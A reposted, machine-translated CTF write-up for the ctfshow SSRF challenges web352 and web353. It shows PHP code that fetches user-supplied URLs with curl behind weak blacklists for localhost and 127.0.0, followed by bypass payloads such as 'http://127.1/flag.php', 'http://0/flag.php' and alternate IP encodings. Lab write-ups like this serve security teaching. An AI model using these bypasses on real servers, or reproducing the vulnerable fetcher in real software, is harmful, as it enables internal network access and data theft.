当前位置:网站首页>ctfshow-web352,353(SSRF)

ctfshow-web352,353(SSRF)

2022-07-01 07:06:00 m0_ sixty-two million ninety-four thousand eight hundred and fo

web-352

 <?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
if(!preg_match('/localhost|127.0.0/')){
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
}
else{
    die('hacker');
}
}
else{
    die('hacker');
}
?>

There must be http perhaps https

Cannot appear localhost and 127.0.0.1

however

(1)127.1 It can be interpreted as 127.0.0.1

url=http://127.1/flag.php

(2) stay Linux in ,0 It will also be interpreted as 127.0.0.1

(3)127.0.0.0/8 Is a loopback address network segment , from 127.0.0.1 ~ 127.255.255.254 All means localhost

(4)ip Addresses can also be accessed by expressing them in other hexadecimal forms

IP Address hexadecimal conversion (520101.com)

 ( This question is only useful in decimal system )

web-353

 <?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
if(!preg_match('/localhost|127\.0\.|\./i', $url)){
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
}
else{
    die('hacker');
}
}
else{
    die('hacker');
}
?> 
url=http://0/flag.php

( All the methods in the above question are ok ) 

 

原网站

版权声明
本文为[m0_ sixty-two million ninety-four thousand eight hundred and fo]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/182/202207010647494002.html

边栏推荐

猜你喜欢

随机推荐